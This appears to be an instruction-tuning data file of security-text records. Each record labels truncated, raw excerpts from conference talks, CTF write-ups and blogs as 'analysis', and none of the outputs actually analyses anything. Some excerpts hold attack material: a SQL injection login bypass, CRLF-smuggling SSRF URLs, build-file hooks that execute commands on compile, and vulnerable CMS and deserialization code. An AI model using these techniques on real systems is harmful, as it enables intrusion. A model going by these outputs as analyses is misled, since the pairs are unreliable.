{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYour boss is a douchebag... How about you? effffn agenda [ Intro [ hacker jobs [ Job status [ Why (some of us) hate it [ Our own mistakes [ Why do we make mistakes? [ Turn the tables [ conclusion DEFCON 18 What matters... [ What you do... [ How much you make... [ Company you work for... [ Your boss... conclusion thanks @effffn effffn@gmail.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SqlSRF (Web, 400p) ``` The root reply the flag to your mail address if you send a mail that subject is \"give me flag\" to root. ``` In the task initially we get access to a login screen and [source code of the index page](index.pl]). First goal is to somehow login into the system. In the sources we can see: ```perl if($q->param('login') ne '') { use DBI; my $dbh = DBI->connect('dbi:SQLite:dbname=./.htDB'); my $sth = $dbh->prepare(\"SELECT password FROM users WHERE username='\".$q->param('user').\"';\"); $errmsg = '<h2 style=\"color:red\">Login Error!</h2>'; eval { $sth->execute(); if(my @row = $sth->fetchrow_array) { if($row[0] ne '' && $q->param('pass') ne '' && $row[0] eq &encrypt($q->param('pass'))) { $s->param('autheduser', $q->param('user')); print \"<scr\".\"ipt>document.location='./menu.cgi';</script>\"; $errmsg = ''; } } }; if($@) { $errmsg = '<h2 style=\"color:red\">Database Error!</h2>'; } $dbh->disconnect(); ``` There is a clear SQLInjection in the query which is supposed to retrieve the password for given user from the database. The password is then compared with `&encrypt($q->param('pass'))`. We can easily inject any password simply by providing username `whateve' union select 'OUR_PASSWORD` but we need to know the encrypted form of `OUR_PASSWORD` for this to work. Fortunately we can see in the code also: ```perl my $user = $q->param('user'); // ($q->param('save') eq '1' ? $q->cookie(-name=>'remember', -value=>&encrypt($user), -expires=>'+1M') : undef) ``` If we put username and select \"remember me\" checkbox, the system will automatically create the cookie with encrypted username. We can then first put `OUR_PASSWORD` as username, select \"remember me\", click login and retrieve the encrypted string from the cookie. Once we manage to login into th system it turns out it's no good because as non-admin user we can only use `netstat` command and we can't use `wget`: ![](page.png) Netstat at least shows that there is SMTP server running there, and the task description sa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n{ GOD MODE unlocked: Hardware backdoors in x86 CPUs domas / @xoreaxeaxeax / DEF CON 2018  Christopher Domas  Cyber Security Researcher ./bio disclaimer: The research presented herein was conducted and completed as an independent consultant. None of the research presented herein was conducted under the auspices of my current employer. The views, information and opinions expressed in this presentation and its associated research paper are mine only and do not reflect the views, information or opinions of my current employer. It is perilous to study too deeply the arts of the Enemy, for good or for ill But such falls and betrayals, alas, have happened before (Demo)  In the beginning, there was chaos   then 30 years ago, we were rescued, by the rings of privilege Ring model Ring model 0 1 2 3 User Kernel  But we dug deeper  ring -1 : the hypervisor  ring -2 : system management mode  ring -3 : Q35 / AMT / ME Ring model  The Enemy still lacks one thing to give him strength and knowledge to beat down all resistance, break down the last defenses, and cover all the lands in a second darkness. He lacks the One Ring  Additionally, accessing some of the internal control registers can enable the user to bypass security mechanisms, e.g., allowing ring 0 access at ring 3. In addition, these control registers may reveal information that the processor designers wish to keep proprietary. For these reasons, the various x86 processor manufacturers have not publicly documented any description of the address or function of some control MSRs - US8341419 Patents  VIA C3  point-of-sale  kiosk  ATM  gaming  digital signage  healthcare  digital media  industrial automation  PCs C3  (Image of test systems) C3  Thin client  C3 Nehemiah Core C3  Unable to locate a developer manual  Follow a trail of patent breadcrumbs  Backdoor architecture US8880851 US9043580 FIG. 3 shows an embodiment of a cache memory. Referring to FIG. 3, in one embodiment, cache memory 320 is a multi-way cache memory. In on", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMichael Ligh, Malicious Code Engineer Greg Sinclair, Rapid-Response Engineer iDefense Security Intelligence Services Malware RCE: Debuggers and Decryptor Development Topics  How to script a debugger for malware RCE  Almost all malicious code uses some form of obfuscation to protect  Strings  Configurations  Command-and-Control (C&C) protocols/hosts  Stolen Data  Save time, leverage the codes own functions  All you have to do is find it  We'll show you some examples  Kraken, Laqma, Silent Banker, DHTMLSpy, Torpig/MBR The Hiding Game Why do malicious code authors obfuscate things?  To make RCE significantly more difficult  To prevent others from reading the stolen data  To prevent others from deciphering the C&C protocol  To make building IDS/IPS and anti-virus signatures more difficult The Hiding Game Why do we de-obfuscate things?  To make RCE easier  To recover stolen data and credentials  To decipher the C&C protocol  To build IDS/IPS and anti-virus signatures Decryptor Development Methods 1. Manual RCE: Decryptor developement based on ASM  Requires the most intimacy with ASM  More code + more complexity = more time consuming 2. Assisted RCE: Pressing F5 (Hex-rays)  Requires type fix-up often 3. Scripting the debugger: Let the malware do the work  More code + more complexity = more time consuming The best method depends on the project  For example, Wireshark plugins require manual or assisted Scripting the Debugger  Generally speaking, there are three classes of scriptable analysis  Active  You control which functions execute and in which order  Redirect EIP (New origin here) and crawl through code  Example: Silent Banker encoded strings (max code coverage)  Passive  Monitor Trojan with function hooks, API or internal  Let it run through (may need !hidedebug)  Example: Kraken network traffic  Recon and utility scripting  Kind of a catch-all, hybrid class  Examples include  Scanning an arbitrary file for shell code  Checking shared DLLs for hooks  Unpacking malware", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nauthorpen4uin time2021/11/13 别想用我源码针对源码泄露的反制思路(仅供娱乐) 目录 0x01 起 0x02 承 0x03 转 Maven Gradle 0x04 合 0x01 起 自从看了@DriverTom师傅写的这篇文章后 给我带来的感受就是关于攻防演练的潜规则就只剩下 0x02 承 之前在fofa的帮助捡到了几套源码 同时也从github从git clone了很多工具的源码(java)进行review 学习但是在IDEA初次打开的时候 相信大家对下面这个弹窗不会陌生 我不知道你们的选择是什么我之前都是毫不在意地Trust Project然后使用maven打包运行 但是针对这个小细节不由心生疑惑这个潜意识的操作有被反制的可能吗 0x03 转 这里只测试经常遇到了的两种Java项目构建工具提供思路其他的可自行测试 Maven 测试如下 源码 demo.java pom.xml public class demo { public static void main(String[] args) { System.out.println(\"Hacked By Yourself \"); } } <?xml version=\"1.0\" encoding=\"UTF-8\"?> <project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\"> <modelVersion>4.0.0</modelVersion> <groupId>org.example</groupId> <artifactId>rceDemo</artifactId> <version>1.0-SNAPSHOT</version> <properties> <maven.compiler.source>7</maven.compiler.source> <maven.compiler.target>7</maven.compiler.target> </properties> <build> <plugins> <plugin> <groupId>org.codehaus.mojo</groupId> <artifactId>exec-maven-plugin</artifactId> <version>1.1.1</version> <executions> <execution> <id>some-execution</id> <phase>compile</phase> <goals> <goal>exec</goal> </goals> </execution> </executions> <configuration> <executable>calc</executable> 弹计算器 Gradle 测试如下 源码 build.gradle </configuration> </plugin> </plugins> </build> </project> plugins { id 'java' } group 'org.example' version '1.0-SNAPSHOT' repositories { mavenCentral() } dependencies { settings.gradle 0x04 合 其实关于漏洞产生的本质Untrusted Data From Outside不仅适用于各种网站各种软件也 同样适用于我们自己 水这篇文章虽有供娱乐的目的但同时也是给自己提个醒儿以后在这些方面还是留意一下别栽了跟 头 至于如何提升杀伤力真正达到反制的效果我不会我是废物 testImplementation 'org.junit.jupiter:junit-jupiter-api:5.7.0' testRuntimeOnly 'org.junit.jupiter:junit-jupiter-engine:5.7.0' } task demo(type: Exec){ commandLine 'cmd', '/c', 'calc' } rootProject.name = 'gradleRce' 参考 https://qastack.cn/programming/3491937/i-want-to-execute-shell-commands-from-mavens- pom-xml", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCovert Post-Exploitation Forensics with Metasploit Wesley McGrew McGrewSecurity.com Mississippi State University National Forensics Training Center From the DEF CON 19 CFP: Okay, lets get sneaky... Covert  without the subjects knowledge Post-Exploitation  after a remote compromise, local backdoor Forensics  reconstructing data above and beyond what the subject anticipates Forensics and penetration testing/ other offensive operations For the forensics geeks... ? No subject location, no problem Surreptitious acquisition and analysis Familiar tools... For the penetration testing geeks... Potential for more important data gathered per compromised system We dont keep that data Multiple revisions of files, old data Data carving General purpose scripting Stealthy! Typical Forensics Examination Scenarios  Hardware seizure  Authorized software agents  On-site  Suspect/Subject is aware Covert Remote Forensics  Unaware Subject  No known physical location?  Not a deal-killer.  Remote imaging  Remote block device access Ears perking up yet?  Intelligence  Penetration testers upping post- exploitation game  Compliance  Criminal Forensics for people who break things Semester-long class Week-long LE Courses Talk to Pent este rs File System Forensic Capabilities  Allocated files  Deleted files  Slack space  Disk/Volume  Unallocated space  Deletion vs. Formatting vs. Wiping  Imaging Slack Space Example Sector size: 512 bytes Cluster size: 4 sectors File size: 4150 bytes RAM Slack (probably 0d) Disk Slack (potential goodies) Cant I do this already?  Load sleuth kit up onto the compromised target?  Probably will work but...  ...stomping on deleted files  ...not that stealthy  ...a little less slick than what Im proposing: Enter Railgun  Patrick HVE - Are you out there? Massive thanks! If we can call Windows API remotely...  ...then we can access physical/logical block devices directly  ...which means we can read arbitrary sectors from the disk  ...why not map remote block devices to local ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n微擎 CMS从 SQL 到 RCE 0x01 写在前 微擎 CMS 在 2.0 版本的时候悄咪咪修复了处 SQL 注漏洞 api.php 536  该处的注漏洞上没有出现过分析章因此本就来分析下该处 SQL 注的利 0x02 影响版本 经过测试发现官在 GitLee 上在 v1.5.2 存在此漏洞在 2.0 版本修复了该漏洞因此 测少影响到 v1.5.2 版本 0x03 SQL 注漏洞分析 这个注漏洞分析还是较简单的直接定位到存在漏洞的代码处 api.php 530 开始 564 开始的两个函数 private function analyzeSubscribe(&$message) { global $_W; $params = array(); $message['type'] = 'text'; $message['redirection'] = true; if(!empty($message['scene'])) { $message['source'] = 'qr'; $sceneid = trim($message['scene']); $scene_condition = ''; if (is_numeric($sceneid)) { $scene_condition = \" `qrcid` = '{$sceneid}'\"; }else{ $scene_condition = \" `scene_str` = '{$sceneid}'\"; } $qr = pdo_fetch(\"SELECT `id`, `keyword` FROM \" . tablename('qrcode') . \" WHERE {$scene_condition} AND `uniacid` = '{$_W['uniacid']}'\"); if(!empty($qr)) { $message['content'] = $qr['keyword']; if (!empty($qr['type']) && $qr['type'] == 'scene') { $message['msgtype'] = 'text'; } $params += $this->analyzeText($message); return $params; } } $message['source'] = 'subscribe'; $setting = uni_setting($_W['uniacid'], array('welcome')); if(!empty($setting['welcome'])) { $message['content'] = $setting['welcome']; $params += $this->analyzeText($message); } return $params; } private function analyzeQR(&$message) { global $_W; $params = array(); 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 $params = $this->handler($message['type']); if (!empty($params)) { return $params; } $message['type'] = 'text'; $message['redirection'] = true; if(!empty($message['scene'])) { $message['source'] = 'qr'; $sceneid = trim($message['scene']); $scene_condition = ''; if (is_numeric($sceneid)) { $scene_condition = \" `qrcid` = '{$sceneid}'\"; }else{ $scene_condition = \" `scene_str` = '{$sceneid}'\"; } $qr = pdo_fetch(\"SELECT `id`, `keyword` FROM \" . tablename('qrcode') . \" WHERE {$scene_condition} AND `uniacid` = '{$_W['uniacid']}'\"); } if (empty($qr) && !empty($message['ticket'])) { $message['source'] = 'qr'; $ticket = tr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai Taiwan No.1 About Orange Tsai The most professional red team in Taiwan About Orange Tsai The largest hacker conference in Taiwan founded by chrO.ot About Orange Tsai Speaker - Speaker at several security conferences HITCON, WooYun, AVTokyo CTFer - CTFs we won champions / in finalists (as team HITCON) DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF Bounty Hunter - Vendors I have found Remote Code Execution Facebook, GitHub, Uber, Apple, Yahoo, Imgur About Orange Tsai Agenda Introduction Make SSRF great again Issues that lead to SSRF-Bypass Issues that lead to protocol smuggling Case studies and Demos Mitigations What is SSRF? Server Side Request Forgery Bypass Firewall, Touch Intranet Compromise Internal services Struts2 Redis Elastic Protocol Smuggling in SSRF Make SSRF more powerful Protocols that are suitable to smuggle HTTP based protocol Elastic, CouchDB, Mongodb, Docker Text-based protocol FTP, SMTP, Redis, Memcached Quick Fun Example http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ urllib2 httplib requests urllib Quick Fun Example Quick Fun Example CR-LF Injection on HTTP protocol Smuggling SMTP protocol over HTTP protocol http://127.0.0.1:25/%0D%0AHELO orange.tw%0D%0AMAIL FROM >> GET / << 421 4.7.0 ubuntu Rejecting open proxy localhost [127.0.0.1] >> HELO orange.tw Connection closed SMTP Hates HTTP Protocol It Seems Unexploitable Gopher Is Good What If There Is No Gopher Support? HTTPS What Won't Be Encrypted in a SSL Handshake? Quick Fun Example https://127.0.0.1%0D%0AHELOorange.tw%0D%0AMAILFROM:25/ $ tcpdump -i lo -qw - tcp port 25 | xxd 000001b0: 009c 0035 002f c030 c02c 003d 006a 0038 ...5./.0.,.=.j.8 000001c0: 0032 00ff 0100 0092 0000 0030 002e 0000 .2.........0.... 000001d0: 2b31 3237 2e30 2e30 2e31 200d 0a48 454c +127.0.0.1 ..HEL 000001e0: 4f20 6f72 616e 6765 2e74 770d 0a4d 4149 O orange. tw..MAI 000001f0: 4c20 4652 4f4d 2e2e 2e0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking Information Visualization System Usability Overloading and Deceiving the Human Gregory Conti Mustaque Ahamad John Stasko College of Computing College of Computing College of Computing Georgia Institute of Technology Georgia Institute of Technology Georgia Institute of Technology ABSTRACT Information visualization is an effective way to easily comprehend large amounts of data. For such systems to be truly effective, the information visualization designer must be aware of the ways in which their system may be manipulated and protect their users from attack. In addition, users should be aware of potential attacks in order to minimize or negate their effect. These attacks target the information visualization system as well as the perceptual, cognitive and motor capabilities of human end users. To identify and help counter these attacks we present a framework for information visualization system security analysis, a taxonomy of visualization attacks and technology independent principles for countering malicious visualizations. These themes are illustrated with case studies and working examples from the network security visualization domain, but are widely applicable to virtually any information visualization system. CR Categories: H.5.2 [Information Systems]: Information Interfaces and Presentation - User Interfaces; C.2.3 [Computer- Communication Networks]: Network Operations: Network monitoring; C.2.0 [Computer-Communication Networks]: General - Security and Protection Keywords: malicious visualizations, usability attacks, denial of information, secure visualization, information visualization 1 INTRODUCTION Information visualization systems used for decision making must be designed with security in mind. Such systems are vulnerable to attack, either from malicious entities attempting to overwhelm, mislead or distract the human viewer or from non-malicious entities that accomplish the same result by accident. Some might believe that todays systems are not pote", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage org.vulhub; import java.io.IOException; import java.io.ObjectInputStream; import org.apache.logging.log4j.core.net.server.ObjectInputStreamLogEventBridge; import org.apache.logging.log4j.core.net.server.TcpSocketServer; public class App { public static void main(String[] args) { TcpSocketServer<ObjectInputStream> myServer = null; try { myServer = new TcpSocketServer<ObjectInputStream>(4712, new ObjectInputStreamLogEventBridge()); } catch (IOException e) { e.printStackTrace(); } myServer.run(); } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0xcsandker  csandker  RSS Feed //Posts //History of Windows //Archive //Tags & Search //ME  Switch Theme Debugging and Reversing ALPC 29 May 2022 >> Introduction & Disclaimer >> Environment Preparation >> Getting Off The Ground >> From User to Kernel Land >> Hunting An ALPC Object This post is an addendum to my journey to discover and verify the internals of ALPC, which Ive documented in Offensive Windows IPC Internals 3: ALPC. While preparing this blog I gured a second post, explaining the debugging steps I took to verify and discover ALPC behaviour, could be useful to all of us that are beginners in the eld of reverse engineering and/or debugging. Contents: Introduction & Disclaimer While Ive certainly used the techniques and methods shown in this post below, these where not my only resources and tools to dive into ALPC. Even implying this would undermine the important and major work of other researchers that have documented and reversed ALPC internals in the past, like Alex Ionescu and many others. Hence this disclaimer. TL;DR: The techniques below are practical and useful, but I was only able to apply them due to the work of others. Another important disclaimer is: I am - by no means - an experienced reverse engineer and this blog post is not meant to be an introduction into how to become a reverse engineer or show a smart way to get in this eld. This is a use Windows debugging to stumble into a topic and make your way to look around post. In order to follow the steps shown below you want to set up a kernel debugging environment. If you already have a kernel debugging environment set up, feel free to skip to section Getting Off The Ground. If you dont, youve got two basic choices for this setup: >> Local live kernel debugging >> Remote kernel debugging Although the local kernel debugging option only requires a single test machine (virtual VM) and only a single command and a reboot to set you up, I nevertheless recommend starting two machines (VMs) and set up for", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHardware Black Magic: Building devices with FPGAs Dr. Fouad Kiamilev, Professor CVORG Labs Electrical and Computer Engineering University of Delaware http://cvorg.ece.udel.edu Updated Slides and Video Updated slides as well as video tutorials will be available after the conference on our website at http://www.cvorg.ece.udel.edu Also during our talk, to keep things interesting during compilation we will be giving away swag in an attempt to keep you interested. See the slides towards the end for details. What is CVORG? From Dela-where? Operate like a Pirate Ship, sailing where our curious minds take us! Interests in reverse engineering, custom hardware, red-teaming, security (especially hardware), networking, high speed communications, you name it, we love doing it! The Jack-of-all trades research group! What are FPGAs Field-programmable gate arrays contains logic blocks that can reconfigured This allows a FPGA to be any moderately complex embedded device FPGA design tools cover the entire range of hardware and software design. For example, in the Xilinx world the ISE is mainly where you write HDL and the EDK is where you can write C. Hardware While it can be scary, it should be embraced and not avoided For every software, there is hardware behind it Why spend hours hacking firmware to do what you want - make a device do it for you! Embedded Design Physical Layout and Interconnects Functional Hardware Units Interconnects and controllers Operating System Software Choices for Digital System Development Processor? Easy to write code, expensive chips, ok performance, power hungry Gate Array (ASIC)? Very high performance, low power, very hard to design, expensive to manufacture Field-Programmable Gate Array? no manufacturing needed (just program), easier to design than ASIC, high performance, lower power What uses FPGAs? Set-Top Boxes Printers Networking Equipment Large Integrated Systems FPGAs Advantage: Application specific speed 802.11 key cracking PC jc-wepcrack 1.25 GHz ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nM A N N I N G Neil Madden API security Authorization Audit logging Authentication Encryption Rate-limiting Passwords Token-based Cookies Macaroons JWTs Certificates End-to-end Identity-based ACLs Roles ABAC Capabilities OAuth2 Security mechanisms Mechanism Chapter Audit logging 3 Rate-limiting 3 Passwords 3 Cookies 4 Token-based auth 5 Macaroons JSON web tokens (JWTs) 6 Mechanism Chapter Access control lists (ACL) 3 Roles Attribute-based access control (ABAC) 8 Capabilities Oauth2 Encryption 6 End-to-end authentication 13 11 Certificates 7 8 9 9 API Security in Action NEIL MADDEN M A N N I N G SHELTER ISLAND For online information and ordering of this and other Manning books, please visit www.manning.com. The publisher offers discounts on this book when ordered in quantity. For more information, please contact Special Sales Department Manning Publications Co. 20 Baldwin Road PO Box 761 Shelter Island, NY 11964 Email: orders@manning.com 2020 by Manning Publications Co. All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by means electronic, mechanical, photocopying, or otherwise, without prior written permission of the publisher. Many of the designations used by manufacturers and sellers to distinguish their products are claimed as trademarks. Where those designations appear in the book, and Manning Publications was aware of a trademark claim, the designations have been printed in initial caps or all caps. Recognizing the importance of preserving what has been written, it is Mannings policy to have the books we publish printed on acid-free paper, and we exert our best efforts to that end. Recognizing also our responsibility to conserve the resources of our planet, Manning books are printed on paper that is at least 15 percent recycled and processed without the use of elemental chlorine. Development editor: Toni Arritola Technical development editor: Joshua White Manning Publications Co. Review", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMaximum CTF Get the most from capture the flag Friday, July 31, 2009 capture the flag (Two Toy Soldiers) http://www.flickr.com/photos/janramroth/2264184078/ http://creativecommons.org/licenses/by/2.0/deed.en jot.punkt planet \"Hack the ______\" lightning round Friday, July 31, 2009 Trivia 100 from 2006 qualifier. And yeah this should be insanely obvious. The funny part though is that the next year, the 100 point question was The thunder and lightning RonAlmog http://www.flickr.com/photos/ronalmog/2053473900/ http://creativecommons.org/licenses/by/2.0/deed.en planet \"Hack the ______\" lightning round Friday, July 31, 2009 Trivia 100 from 2006 qualifier. And yeah this should be insanely obvious. The funny part though is that the next year, the 100 point question was The thunder and lightning RonAlmog http://www.flickr.com/photos/ronalmog/2053473900/ http://creativecommons.org/licenses/by/2.0/deed.en Hack \"_____ the planet\" lightning round Friday, July 31, 2009 And likewise, the year after that: Hack \"_____ the planet\" lightning round Friday, July 31, 2009 And likewise, the year after that: \"Hack ___ planet\" the lightning round Friday, July 31, 2009 A fair amount of CTF has been inside jokes and homages to years past. If you plan on participating, check out and practice on previous years answers and writeups as they will make your life much easier. \"Hack ___ planet\" the lightning round Friday, July 31, 2009 A fair amount of CTF has been inside jokes and homages to years past. If you plan on participating, check out and practice on previous years answers and writeups as they will make your life much easier. psifertex Friday, July 31, 2009 Hi, Im psifertex, this is my bio. The parts that matter, anyway. Photo copyright my dad -- used with permission, licensed the same as the presentation.. Friday, July 31, 2009 Its probably not surprising that I prefer Linux over Windows, though the older and lazier I get, the more Steve Jobs takes my money. Friday, July 31, 2009 Its probably not ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Postgresql --- **简介** PostgreSQL是一种先进的对象-关系数据库管理系统ORDBMS它不仅支持关系数据库的各种功能而且还具备类继承等对象数据库的特征 **cli连接** ```bash psql postgres://账户:密码@地址:5432/数据库名称 # 例如 psql postgres://postgres:Abcd1234@127.0.0.1:5432/test ``` **cli下** ```bash # 查看已经存在的数据库 \\l # 进入数据库 \\c + 数据库名 # 查看表格 \\d ``` **报错 : FATAL: no pg_hba.conf entry for host *** user postgres, database postgres, SSL** 修改 pg_hba.conf ``` host all all 0.0.0.0/0 md5 ``` **配置监听** 配置 postgresql.conf ``` listen_addresses = '*' ``` ## 账户 **更改密码** ```sql -- 更改 postgres 密码为 Abcd1234 ALTER USER postgres WITH PASSWORD 'Abcd1234'; ``` ## 导入导出 **导出单表数据** ``` pg_dump -h 127.0.0.1 -U admin -p 5432 -W db -t t1 -inserts > bak.sql ``` **导出多个表数据** ``` pg_dump -h 127.0.0.1 -U admin -p 5432 -W db -t t1 -t t2 -inserts > bak.sql ``` **导出整个数据库** ``` pg_dump -h 127.0.0.1 -U admin -p 5432 -W db -inserts > bak.sql ``` **只导出表结构不导出数据** ``` pg_dump -h 127.0.0.1 -U admin -p 5432 -W db -s > bak.sql ``` **只导出数据不导出表结构** ``` pg_dump -h 127.0.0.1 -U admin -p 5432 -W db -inserts -a > bak.sql ``` **postgresql 导入数据源** ``` pg_restore -h 127.0.0.1 -p 5432 -U postgres -W -d test -v \"test.dump\" ``` --- ## Source & Reference - [PostgreSQL 数据库导入导出](https://blog.51cto.com/niuben/4877093) - https://qa.1r1g.com/sf/ask/890467721/ - https://blog.csdn.net/qq_50119033/article/details/120922628", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"TRUNCATE\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME TRUNCATE \\- 清空一个表 .SH SYNOPSIS .sp .nf TRUNCATE [ TABLE ] \\fIname\\fR .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBTRUNCATE\\fR 快速地从一个表中删除所有行它和无条件的 DELETE 有同样的效果不过因为它不做表扫描因而快得多 在大表上最有用 .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 要清空的表名字可以有模式修饰 .SH \"NOTES 注意\" .PP 如果从其它表有到这个表的外键引用那么就不能使用 TRUNCATE 在这种情况下检查有效性要求进行表扫描而 TRUNCATE 的概念是不做这样的事情 .PP \\fBTRUNCATE\\fR 不会运行任何在该表上存在的 ON DELETE 触发器 .SH \"EXAMPLES 例子\" .PP 截断表 bigtable .sp .nf TRUNCATE TABLE bigtable; .sp .fi .SH \"COMPATIBILITY 兼容性\" .PP SQL 标准里没有 TRUNCATE  .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSix Degrees of Domain Admin About Us I am Andy Robbins Job: Pentester at Veris Groups ATD Speaker: BSidesLV/Seattle, ISC2 World Congress, ISSA International Trainer: Black Hat USA 2016 Other: Ask me about ACH Twitter: @_wald0 About Us I am Rohan Vazarkar Job: Pentester at Veris Groups ATD Tool creator/dev: EyeWitness, Python Empyre, etc. Presenter: BSidesDC/LV/DE, Black Hat Arsenal Trainer: Black Hat USA 2016 Twitter: @CptJesus About Us I am Will Schroeder Job: Researcher at Veris Groups ATD Tool creator/dev: Veil-Framework, PowerView, PowerUp, Empire/Empyre Speaker: Ask me Trainer: Black Hat USA 2014-2016 Other: Microsoft PowerShell/CDM MVP Twitter: @harmj0y The Current State of Active Directory Domain Privilege Escalation Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. John Lambert GM, Microsoft Threat Intelligence Center AD Domain Priv Esc  Active Directory is ubiquitous  Ubiquity = Attention = Research time and $$$  Sometimes we get easy buttons! DA DA ! ! ! ! ! ! ! Derivative Local Admin The chaining or linking of administrator rights through compromising other privileged accounts Justin Warner @sixdub ! ! Bob PC1 Mary PC2 ! Bob Help Desk Server Admins PC2 Challenges  Extremely time consuming and tedious  Not comprehensive  Limited situational awareness  Did you even need DA? Graph Theory And attack graph design Basic Elements of a Graph Vertices represent individual elements of a system Edges generically represent relationships between vertices Paths are sets of vertices and edges that connect non- adjacent vertices Vertex 1 Vertex 2 Edge Vertex 1 Vertex 3 Vertex 2 Vertex 4 BloodHound Attack Graph Design Vertices represent users, groups, computers, and domains Edges identify group memberships, admin rights, user sessions, and domain trusts Paths always lead toward escalating rights. Always. Group: IT Admins User: Bob MemberOf Computer: Server1 HasSession User: Mary Group: Domain Admins Put Simply  Who is logged on w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMoxie Marlinspike Institute For Disruptive Studies Changing Threats To Privacy moxie@thoughtcrime.org Moxie Marlinspike Institute For Disruptive Studies Moxie Marlinspike Institute For Disruptive Studies Moxie Marlinspike Institute For Disruptive Studies Moxie Marlinspike Institute For Disruptive Studies Moxie Marlinspike Institute For Disruptive Studies Moxie Marlinspike Institute For Disruptive Studies Moxie Marlinspike Institute For Disruptive Studies Cypherpunks Moxie Marlinspike Institute For Disruptive Studies Government Moxie Marlinspike Institute For Disruptive Studies Moxie Marlinspike Institute For Disruptive Studies Dangerous Moxie Marlinspike Institute For Disruptive Studies Scared Moxie Marlinspike Institute For Disruptive Studies The Fuck Moxie Marlinspike Institute For Disruptive Studies Out Of Them Moxie Marlinspike Institute For Disruptive Studies Ultimate Control  No Control Moxie Marlinspike Institute For Disruptive Studies As Dangerous? = Moxie Marlinspike Institute For Disruptive Studies Moxie Marlinspike Institute For Disruptive Studies Cryptography Is Not A Banana != Moxie Marlinspike Institute For Disruptive Studies Cypherpunks Write Code! Moxie Marlinspike Institute For Disruptive Studies Moxie Marlinspike Institute For Disruptive Studies PGP: source code and internals MIT Press 1995 Moxie Marlinspike Institute For Disruptive Studies 2000 == game over? Moxie Marlinspike Institute For Disruptive Studies the spread of information is inevitable Moxie Marlinspike Institute For Disruptive Studies predictions  Anonymous digital cash will flourish.  Intellectual property will disappear.  Surveillance will become impossible.  Governments will be unable to continue collecting taxes.  Governments will fall. Moxie Marlinspike Institute For Disruptive Studies 10 years on Moxie Marlinspike Institute For Disruptive Studies Is This Victory?  Everyone's mother has an illegal copy of an mp3 somewhere.  Cryptography is everywhere.  There are actual darknets w", "category": "text_analysis", "source": "security_papers"}
